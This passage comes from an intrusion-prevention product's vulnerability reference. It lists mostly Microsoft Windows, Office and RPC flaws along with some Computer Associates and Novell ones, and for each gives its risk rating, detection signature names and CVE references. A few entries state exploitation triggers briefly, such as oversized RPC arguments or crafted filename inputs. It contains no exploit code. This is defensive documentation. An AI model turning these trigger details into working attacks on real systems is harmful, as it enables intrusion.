Description: The Network News Transfer Protocol (NNTP) component of Microsoft Windows NT Server 4.0, Windows 2000 Server, Windows Server 2003, Exchange 2000 Server, and Exchange Server 2003 allows remote attackers to execute arbitrary code via XPAT patterns, possibly related to improper length validation and an "unchecked buffer," leading to off-by-one and heap-based buffer overflows.
Situation: NNTP_MS-Windows-NNTP-Server-Buffer-Overflow
References:
CVE-2004-0574
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0574
BID-11379
http://www.securityfocus.com/bid/11379
OSVDB-10697
http://www.osvdb.org/10697
MS04-036
http://technet.microsoft.com/security/bulletin/MS04-036
Back to top

MS-Office-Xp-Url-BOF-MS05-005

About this vulnerability: Buffer overflow in MS Office XP (MS05-005)
Risk: Low
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1602-5242
Platform: Windows
Software: Microsoft Office XP
Type: Buffer Overflow
Description: Microsoft Office XP has a buffer overflow vulnerability in the process that passes URL file locations to the software. A remote attacker could send a specially crafted URL request with long inputs after (1) %00 (null byte) in .doc filenames or (2) %0a (new line) in .rtf filenames to overflow a buffer and execute arbitrary code on the system with the victim's privileges.
References:
CVE-2004-0848
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0848
BID-12480
http://www.securityfocus.com/bid/12480
OSVDB-13594
http://www.osvdb.org/13594
MS05-005
http://technet.microsoft.com/security/bulletin/MS05-005
Back to top

MS-RPC-DCOM-Interface-DoS-MS03-039

About this vulnerability: Denial of Service (DoS) vulnerability in MS Windows RPC DCOM interface (MS03-039)
Risk: Moderate
First detected in: sgpkg-ips-24-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP3; Windows 2000 SP4
Software: Windows DCOM RPC Service
Type: Malfunction
Description: A denial of service vulnerability exists in Microsoft Windows RPCSS service. The vulnerability is due to lack of data validation when RPCSS service handles DCOM activation requests. A remote un-authenticated attacker can exploit this flaw by sending specially crafted RPC requests to the RPCSS service on the target system. Successful exploitation could raise a denial of service condition of the RPCSS service on the target system. An attack targeting this vulnerability can result in termination of the affected service, RPCSS. As a result of this, certain basic functions, such as copy-paste, RPC emapper, and DCOM services will not be available. The system will still be operating, with some of its functions disabled.
Situation: MSRPC-TCP_MS-RPC-DCOM-Interface-DoS-MS03-039-2
MSRPC-TCP_CPS-MS-RPC-DCOM-Interface-DoS-MS03-039-2
MSRPC-TCP_CPS-MS-RPC-DCOM-Interface-DoS-MS03-039
References:
CVE-2003-0605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0605
BID-8234
http://www.securityfocus.com/bid/8234
OSVDB-11460
http://www.osvdb.org/11460
MS03-039
http://technet.microsoft.com/security/bulletin/MS03-039
Back to top

MS-RPC-Endpoint-Mapper-DoS-MS03-010

About this vulnerability: Denial of Service (DoS) vulnerability in MS Windows RPC Endpoint Mapper (MS030-010)
Risk: Moderate
First detected in: sgpkg-ips-24-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows NT 4.0; Windows XP
Software: RPC
Type: Malfunction
Description: Microsoft Windows 2000, Windows NT, and Windows XP systems are vulnerable to a Denial of Service (DoS) attack in the RPC (Remote Procedure Call) service, if TCP port 135 is opened. A remote attacker could send a malformed packet to TCP port 135 to cause the RPC service to become disabled.
Situation: MSRPC-TCP_CPS-MS-RPC-Endpoint-Mapper-DoS-MS03-010
References:
CVE-2002-1561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1561
BID-6005
http://www.securityfocus.com/bid/6005
MS03-010
http://technet.microsoft.com/security/bulletin/MS03-010
Back to top

MS-SCOM-Web-Console-XSS-Vulnerability-CVE-2013-0010

About this vulnerability: XSS in SCOM
Risk: Moderate
First detected in: sgpkg-ips-502-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft System Center Operations Manager
Type: Cross-site Scripting
Description: A very large XML file was detected
Situation: HTTP_CRL-MS-SCOM-Web-Console-XSS-Vulnerability-CVE-2013-0010
References:
CVE-2013-0010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0010
MS13-003
http://technet.microsoft.com/security/bulletin/MS13-003
Back to top

MS-Search-URI-Scheme

About this vulnerability: search-ms or search URI scheme
Risk: Moderate
First detected in: sgpkg-ips-1738-5242
Last changed: sgpkg-ips-1774-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Windows Search and search-ms protocols allow calling Windows Search Explorer or any other desktop search applications. Both protocols also support searches on remote file shares. This functionality can be used for enticing a user into downloading and executing malicious files.
Situation: File-Text_Suspicious-MS-Search-URI-Scheme-Link-In-HTML
File-Text_MS-Search-URI-Scheme-Link-In-HTML
Back to top

MS-Sharepoint-Workflowcodetypereferenceexpression-Insecure-Deserialization

About this vulnerability: A vulnerability in Microsoft Sharepoint Enterprise Server
Risk: Moderate
First detected in: sgpkg-ips-1547-5242
Last changed: sgpkg-ips-1547-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: Improper input validation of the workflow rules file used to generate custom workflows causes a deserialization vulnerability in Microsoft Sharepoint. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: File-Text_Microsoft-Sharepoint-Workflow-Workflowcodetypereferenceexpression-Insecure-Deserialization
References:
CVE-2022-35823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35823
Back to top

MS-SMTP-Service-Ntlm-Null-Session-Authentication-Bypass-MS02-011

About this vulnerability: MS Windows SMTP service flaw may allow bypassing mail relay restrictions (MS02-011)
Risk: Moderate
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP0; Windows 2000 SP1; Windows 2000 SP2
Software: Exchange Server 5.0; Exchange Server 5.5
Type: Malfunction
Description: SMTP service in Microsoft Windows 2000 and in Exchange Server 5.0/5.5 does not handle properly responses to NTLM authentication. This allows remote attackers to perform mail relaying via an SMTP AUTH command by using null session credentials.
Situation: SMTP_Ntml-Null-Session-Authentication-Bypass
References:
CVE-2002-0054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0054
BID-4205
http://www.securityfocus.com/bid/4205
OSVDB-5253
http://www.osvdb.org/5253
MS02-011
http://technet.microsoft.com/security/bulletin/MS02-011
Back to top

MS-SQL-Rdbms-Engine-Elevation-Of-Privilege-Vulnerability-CVE-2016-7250

About this vulnerability: A vulnerability in MS SQL
Risk: Moderate
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server
Type: Input Validation
Description: A vulnerability in Microsoft SQL Server
Situation: MSSQL_Rdbms-Engine-Elevation-Of-Privilege-Vulnerability-CVE-2016-7250
References:
CVE-2016-7250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7250
MS16-136
http://technet.microsoft.com/security/bulletin/MS16-136
Back to top

MS-Visio-DXF-File-Buffer-Overflow-CVE-2012-1888

About this vulnerability: Malicios DXF file
Risk: Moderate
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visio
Type: Buffer Overflow
Description: Improper parsing of a DXF file may result in a system compromise
Situation: File-TextId_MS-Visio-DXF-File-Buffer-Overflow-CVE-2012-1888
References:
CVE-2012-1888
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1888
MS12-059
http://technet.microsoft.com/security/bulletin/MS12-059
Back to top

MS-Windows-DHCP-Server-Failover-Mfparsedhcpfailovermessage-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: Moderate
First detected in: sgpkg-ips-1765-5242
Last changed: sgpkg-ips-1765-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Improper handling of DHCP failover packets in the MFParseDhcpFailoverMessage function causes an out of bounds read vulnerability in the Microsoft Windows DHCP server. A successful exploitation causes a denial of service condition.
Situation: Generic_CS-Microsoft-Windows-DHCP-Server-Failover-Mfparsedhcpfailovermessage-Out-Of-Bounds-Read
References:
CVE-2024-30070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30070
Back to top

MS-Windows-Msxml-Information-Disclosure-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An information disclosure vulnerability exists in the MSXML service.
Situation: File-Text_MS-Windows-Msxml-Information-Disclosure-Vulnerability
File-TextId_MS-Windows-Msxml-Information-Disclosure-Vulnerability
References:
CVE-2014-0266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0266
MS14-005
http://technet.microsoft.com/security/bulletin/MS14-005
Back to top

MS-Windows-Print-Spooler-Service-Format-String-Vulnerability

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-468-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Windows.
Situation: SMB-TCP_MS-Windows-Print-Spooler-Service-Format-String-Vulnerability
NetBIOS-UDP_CS-MS-Windows-Print-Spooler-Service-Format-String-Vulnerability
References:
CVE-2012-1851
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1851
BID-54928
http://www.securityfocus.com/bid/54928
OSVDB-84599
http://www.osvdb.org/84599
MS12-054
http://technet.microsoft.com/security/bulletin/MS12-054
Back to top

MS-Windows-SMB-Transaction-BOF-MS05-011

About this vulnerability: Buffer overflow in MS Windows SMB transaction handler
Risk: Moderate
First detected in: sgpkg-ips-349-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP0; Windows 2000 SP1; Windows 2000 SP2; Windows 2000 SP3; Windows 2000 SP4; Windows 2003 SP0; Windows XP SP0; Windows XP SP1; Windows XP SP2
Software: <os>
Type: Buffer Overflow
Description: Microsoft Windows Service Message Block (SMB) transaction handler contains a buffer overflow vulnerability. An authenticated remote attacker could create a malformed SMB Transaction response packet to execute arbitrary code on the client system.
Situation: SMB-TCP_Microsoft-Windows-SMB-Response-Handling-Buffer-Overflow
SMB-TCP_SHS-Microsoft-Windows-SMB-Client-Transaction-BOF-MS05-011
References:
CVE-2005-0045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0045
BID-12484
http://www.securityfocus.com/bid/12484
OSVDB-13600
http://www.osvdb.org/13600
MS05-011
http://technet.microsoft.com/security/bulletin/MS05-011
Back to top

MS-Windows-TrueType-Font-Parsing-Vulnerability-CVE-2012-0159

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An attempt to exploit a vulnerability in Windows
Situation: File-Binary_MS-Windows-TrueType-Font-Parsing-Vulnerability-CVE-2012-0159
References:
CVE-2012-0159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0159
BID-53335
http://www.securityfocus.com/bid/53335
MS12-034
http://technet.microsoft.com/security/bulletin/MS12-034
Back to top

MS-Windows-Weak-Administrator-Password

About this vulnerability: MS Windows uses weak or null Administrator password
Risk: Low
First detected in: sgpkg-ips-22-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: Microsoft Windows has a default Administrator account, which may have a weak or blank password. A remote attacker could exploit this to gain unauthorized access to the vulnerable system.
Situation: SMB-TCP_CHS-Windows-Admin-Share-Default-Password-Access
Back to top

MS-Word-Stack-Buffer-Overwrite-Vulnerability-CVE-2013-1324

About this vulnerability: A vulnerability in Microsoft Word
Risk: Moderate
First detected in: sgpkg-ips-550-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word
Type: Malfunction
Description: A vulnerability in Microsoft Word
Situation: File-Binary_MS-Word-Stack-Buffer-Overwrite-Vulnerability-CVE-2013-1325
File-Binary_MS-Word-Stack-Buffer-Overwrite-Vulnerability-CVE-2013-1324
References:
CVE-2013-1324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1324
MS13-091
http://technet.microsoft.com/security/bulletin/MS13-091
Back to top

MS-XML-Remote-Code-Execution-CVE-2018-8420

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a use-after-free vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_MS-XML-Remote-Code-Execution-CVE-2018-8420
References:
CVE-2018-8420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8420
ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep
Back to top

MS03-043

About this vulnerability: Buffer Overflow in Windows Messenger
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Messenger
Type: Buffer Overflow
Description: Microsoft Windows Messenger Service buffer overflow can be created by crafting a packet containing lots of 0x14 which are replaced by CR+LF. The replacements grow the packet and the new size is not verified allowing a buffer overflow to take place when the packet is copied into a secondary buffer. This allows the attacker to run arbitary code.
Situation: Generic_MSRPC-Messenger-BOF-MS03-043-Breaking-Point
Generic_MSRPC-Messenger-BOF-MS03-043
MSRPC-UDP_CPS-Messenger-BOF-MS03-043
References:
CVE-2003-0717
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0717
BID-8826
http://www.securityfocus.com/bid/8826
MS03-043
http://technet.microsoft.com/security/bulletin/MS03-043
Back to top

MSHTML_Engine_Memory_Corruption_Vulnerability_CVE-2020-1567

About this vulnerability: A vulnerability in MSHTML Engine
Risk: High
First detected in: sgpkg-ips-1269-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Use-after-free
Description: There exists a memory corruption vulnerability in MSHTML Engine. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_MSHTML_Engine_Memory_Corruption_Vulnerability_CVE-2020-1567
References:
CVE-2020-1567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1567
ms20-aug
http://technet.microsoft.com/security/bulletin/ms20-aug
Back to top

MSIE-Information-Disclosure-Vulnerability-CVE-2013-3908

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-550-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer
Situation: HTTP_CSU-Script-Tag-In-URI
HTTP_CSU-MSIE-Information-Disclosure-Vulnerability-CVE-2013-3908
References:
CVE-2013-3908
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3908
OSVDB-99644
http://www.osvdb.org/99644
MS13-088
http://technet.microsoft.com/security/bulletin/MS13-088
Back to top

MSIE-JSON-Array-Information-Disclosure-Vulnerability

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_MSIE-JSON-Array-Information-Disclosure-Vulnerability
References:
CVE-2013-1279
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1279
MS13-037
http://technet.microsoft.com/security/bulletin/MS13-037
Back to top

MSIE-JSON-Parsing-Vulnerability-CVE-2013-3861

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer
Situation: HTTP_CS-MSIE-JSON-Parsing-Vulnerability-CVE-2013-3861
References:
CVE-2013-3861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3861
MS13-082
http://technet.microsoft.com/security/bulletin/MS13-082
Back to top

MSIE-Memory-Corruption-Vulnarability-CVE-2013-3193

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_MSIE-Memory-Corruption-Vulnarability-CVE-2013-3193
References:
CVE-2013-3193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3193
MS13-059
http://technet.microsoft.com/security/bulletin/MS13-059
Back to top

MSN-Messenger-Usage

About this vulnerability: MSN Messenger usage
Risk: Moderate
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MSN Messenger
Type: Peer-to-Peer
Description: MSN Messenger is a peer-to-peer network client that can be used to send messages and share files among users.
Situation: HTTP_CS-MSN-Login
HTTP_CSH-MSN-Live-Messenger-Over-HTTP
IM-TCP_MSN-Login
IM-TCP_MSN-Login-Reply
IM-TCP_MSN-P2P-File-Transfer
Back to top

MSN-WebMessenger-Usage

About this vulnerability: MSN WebMessenger usage
Risk: Moderate
First detected in: sgpkg-ips-128-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MSN Messenger
Type: Instant Messenger
Description: MSN WebMessenger is a web service which allows users to connect to other MSN Messenger users through a web interface.
Back to top

MSRPC-Big-Endian-Byte-Order-Used

About this vulnerability: MSRPC traffic using big endian byte order detected, possible IDS evasion attempt
Risk: Moderate
First detected in: sgpkg-ips-104-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: The MSRPC protocol allows both little endian and big endian byte order to be used. Normal MSRPC traffic does not usually contain requests using big endian byte order but such requests may be used by attackers in IDS evasion attempts.
Situation: Generic_UDP-MSRPC-Big-Endian-Byte-Order-Used
MSRPC-UDP_Big-Endian-Byte-Order-Used
MSRPC-TCP_CPS-Big-Endian-Byte-Order-Used
Generic_CS-MSRPC-Big-Endian-Byte-Order-Used
Back to top

MSRPC-Bind-Over-SMB2

About this vulnerability: An MSRPC bind request over SMB was detected
Risk: Moderate
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: An MSRPC bind request over SMB was detected
Situation: SMB-TCP_CS-MSRPC-Bind-Over-SMB2
Back to top

MSRPC-CA-Alert-Notification-Server-RPC-Request-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Computer Associates Alert Notification Server
Risk: High
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor; Computer Associates Protection Suite 3; Computer Associates Threat Manager for the Enterprise
Type: Buffer Overflow
Description: Computer Associates Alert Notification Server has a stack-based buffer overflow vulnerability. A remote attacker can send a malformed RPC request with an excessively long Conformant String to an affected host to cause a DoS or compromise the vulnerable system.
Situation: MSRPC-TCP_CPS-CA-Alert-Notification-Server-RPC-Request-Buffer-Overflow
References:
CVE-2007-3825
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3825
BID-24947
http://www.securityfocus.com/bid/24947
Back to top

MSRPC-CA-Message-Engine-RPC-Server-Buffer-Overflow

About this vulnerability: MSRPC Computer Associates Message Engine RPC server buffer overflow
Risk: High
First detected in: sgpkg-ips-83-1314
Last changed: sgpkg-ips-1555-5242
Platform: Windows
Software: Computer Associates BrightStor; Computer Associates Business Protection Suite; Computer Associates Business Protection Suite 2; Computer Associates Server Protection Suite 2
Type: Buffer Overflow
Description: The Message Engine component in Computer Associates BrightStor and Business Protection Suite products suffers from a buffer overflow vulnerability. An RPC request with opnum 43 and an argument string longer than 680 bytes will overflow a buffer, potentially allowing arbitrary code execution. The Message Engine runs with System level privileges by default.
Situation: MSRPC-TCP_CPS-CA-Message-Engine-RPC-Server-Buffer-Overflow
References:
CVE-2006-5143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143
BID-20365
http://www.securityfocus.com/bid/20365
Back to top

MSRPC-CA-Products-Message-Engine-RPC-Server-Buffer-Overflow

About this vulnerability: Computer Associates Message Engine stack-based buffer overflow vulnerability
Risk: High
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-1554-5242
Platform: Windows
Software: Computer Associates BrightStor; Computer Associates Business Protection Suite 2; Computer Associates Server Protection Suite 2
Type: Buffer Overflow
Description: Computer Associates Message Engine suffers from a stack-based buffer overflow vulnerability. An RPC request with opnum 45 and an invalid index value can cause a buffer overflow condition, allowing arbitrary code execution. The Message Engine runs with System level privileges by default.
Situation: MSRPC-TCP_CPS-CA-Products-Message-Engine-RPC-Server-Buffer-Overflow
References:
CVE-2006-5143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143
BID-20365
http://www.securityfocus.com/bid/20365
Back to top

MSRPC-Encryption-Usage

About this vulnerability: MSRPC encryption may be used by attackers to hide exploits and avoid detection
Risk: Moderate
First detected in: sgpkg-ips-96-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: The MSRPC protocol allows connections to be encrypted. This feature may also be used by attackers to hide attacks and avoid detection.
Situation: MSRPC-TCP_Encryption-Usage
Back to top

MSRPC-LSASS-DOS-MS09-059

About this vulnerability: Denial of service vulnerability in MSRPC NTLMSSP authentication
Risk: Low
First detected in: sgpkg-ips-258-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A denial of service vulnerability exists in the Microsoft Windows Local Security Authority Subsystem Service (LSASS). The vulnerability is due to insufficient validation when handling specially crafted NTLM authentication packets. Remote attackers could exploit this vulnerability by sending a specially crafted network message to a computer running the Server service. Successful exploitation would result in a read access violation error on the host, which leads to a system wide denial of service condition.
Situation: MSRPC-TCP_NTLMSSP-Authentication-Null-Session-Denial-Of-Service
References:
CVE-2009-2524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2524
BID-36593
http://www.securityfocus.com/bid/36593
MS09-059
http://technet.microsoft.com/security/bulletin/MS09-059
Back to top

MSRPC-Message-Queuing-Service-Queue-Name-String-Buffer-Overflow

About this vulnerability: A buffer overflow in the Microsoft Message Queuing Service
Risk: Moderate
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP4;Windows XP SP2;Windows 2000 Server
Software: <os>
Type: Buffer Overflow
Description: Microsoft Message Queuing (MSMQ) Service suffers from a buffer overflow vulnerability in the handling of long queue names. Remote attackers can exploit the vulnerability via an unauthenticated MSRPC request containing a malicious message queue name, and potentially execute arbitrary code on the vulnerable host.
Situation: MSRPC-TCP_CPS-Message-Queuing-Service-Queue-Name-String-Buffer-Overflow
References:
CVE-2007-3039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3039
BID-26797
http://www.securityfocus.com/bid/26797
MS07-065
http://technet.microsoft.com/security/bulletin/MS07-065
Back to top

MSRPC-Microsoft-Client-Service-For-NetWare-Memory-Corruption

About this vulnerability: Buffer overflow vulnerability in the Microsoft Client Service for NetWare
Risk: Critical
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Microsoft Client Service for NetWare has a stack-based buffer overflow vulnerability. By sending a malformed RPC request to an affected system a remote attacker can cause a DoS or execute arbitrary code with the privileges of the vulnerable service, normally System.
Situation: MSRPC-TCP_CPS-Microsoft-Client-Service-For-NetWare-Memory-Corruption
References:
CVE-2006-4688
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4688
BID-20984
http://www.securityfocus.com/bid/20984
OSVDB-30260
http://www.osvdb.org/30260
MS06-066
http://technet.microsoft.com/security/bulletin/MS06-066
Back to top

MSRPC-Microsoft-Windows-RRAS-Memory-Corruption

About this vulnerability: Buffer overflow vulnerability in Microsoft RRAS service
Risk: Critical
First detected in: sgpkg-ips-71-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Microsoft Routing and Remote Access service has a buffer overflow vulnerability in the handling of the ServiceRequest function. A parameter passed to the function is copied into a 16-byte buffer without sufficient boundary checking allowing a malicious remote attacker to overrun the buffer and cause a DoS condition or execute arbitrary code with the privileges of the vulnerable service, normally SYSTEM.
Situation: MSRPC-TCP_CPS-Microsoft-Windows-RRAS-Memory-Corruption
MSRPC-TCP_CPS-Microsoft-Windows-RRAS-Memory-Corruption-2
References:
CVE-2006-2370
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2370
BID-18325
http://www.securityfocus.com/bid/18325
OSVDB-26437
http://www.osvdb.org/26437
MS06-025
http://technet.microsoft.com/security/bulletin/MS06-025
Back to top

MSRPC-Microsoft-Windows-Server-Service-Buffer-Overrun

About this vulnerability: Buffer overflow vulnerability in Microsoft Server service
Risk: Critical
First detected in: sgpkg-ips-75-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Microsoft Server service has a buffer overflow vulnerability. By sending specially crafted packets to an affected system a remote attacker can cause a denial of service condition or take complete control of the system.
Situation: HTTP_CSU-Mocbot-Traffic
MSRPC-TCP_CPS-Microsoft-Windows-Server-Service-Buffer-Overrun
MSRPC-TCP_CPS-Vulnerable-Microsoft-Windows-Server-Service-Function-Called
References:
CVE-2006-3439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439
BID-19409
http://www.securityfocus.com/bid/19409
MS06-040
http://technet.microsoft.com/security/bulletin/MS06-040
Back to top

MSRPC-Microsoft-Windows-Svcctl-ChangeServiceConfig2A-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-100-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000
Software: <os>
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Windows. By sending a crafted ChangeServiceConfig2A request, a remote authenticated attacker can cause a denial of service condition that leads to a system reboot, or possibly execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Microsoft-Windows-Svcctl-ChangeServiceConfig2A-Memory-Corruption
Back to top

MSRPC-NetrSendMessage-Usage

About this vulnerability: NetrSendMessage MS-RPC interface usage
Risk: Low
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: NetrSendMessage is an MS-RPC operation used to send pop-up messages across a network. These messages are primarily used to send spam to arbitrary hosts on the Internet. The function can be called via a single UDP package, allowing spoofed source IP addressess to be used.
Situation: Generic_Windows-Messenger-Service-NetrSendMessage-Usage
Back to top

MSRPC-Novell-Client-nwspool.dll-EnumPrinters-Function-Stack-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Novell Client for Windows
Risk: Moderate
First detected in: sgpkg-ips-147-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell Client
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Novell Client for Windows. A remote unauthenticated attacker can send a malformed EnumPrinters RPC request to cause a denial of service or execute arbitrary code on the affected host with System-level privileges.
Situation: MSRPC-TCP_CPS-Novell-Client-Print-Provider-RPC-Stack-Buffer-Overflow
References:
CVE-2008-0639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0639
BID-27741
http://www.securityfocus.com/bid/27741
OSVDB-41510
http://www.osvdb.org/41510
Back to top

MSRPC-Novell-Client-Print-Provider-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the Novell Client Print Provider module
Risk: High
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell Client
Type: Buffer Overflow
Description: Novell Client has a stack-based buffer overflow vulnerability. A remote attacker can send a malformed RPC request to an affected host to cause a DoS or compromise the vulnerable system.
Situation: MSRPC-TCP_CPS-Novell-Client-Print-Provider-Buffer-Overflow
References:
CVE-2006-6114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6114
BID-21220
http://www.securityfocus.com/bid/21220
OSVDB-30547
http://www.osvdb.org/30547
Back to top

MSRPC-Novell-Client-Print-Provider-RPC-Stack-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Novell Client for Windows
Risk: Moderate
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell Client
Type: Buffer Overflow
Description: Novell Client for Windows has a stack-based buffer overflow vulnerability. A remote attacker can send a malformed EnumPrinters RPC request to an affected host to cause a denial of service or compromise the vulnerable system.
Situation: MSRPC-TCP_CPS-Novell-Client-Print-Provider-RPC-Stack-Buffer-Overflow
References:
BID-25092
http://www.securityfocus.com/bid/25092
Back to top

MSRPC-NTLMSSP-Authentication-Null-Session-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in MSRPC NTLMSSP authentication
Risk: Low
First detected in: sgpkg-ips-125-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Microsoft MSRPC service has an integer overflow vulnerability that can be triggered via the NTLMSSP authentication method. A specially crafted MSRPC connection where a NULL session is first established with NTLMSSP authentication and later used with a crafted authentication level may result in crashing a vulnerable Windows host. The vulnerability can be exploited by unauthenticated remote attackers.
Situation: MSRPC-TCP_NTLMSSP-Authentication-Null-Session-Denial-Of-Service
References:
CVE-2007-2228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2228
BID-27134
http://www.securityfocus.com/bid/27134
MS07-058
http://technet.microsoft.com/security/bulletin/MS07-058
Back to top

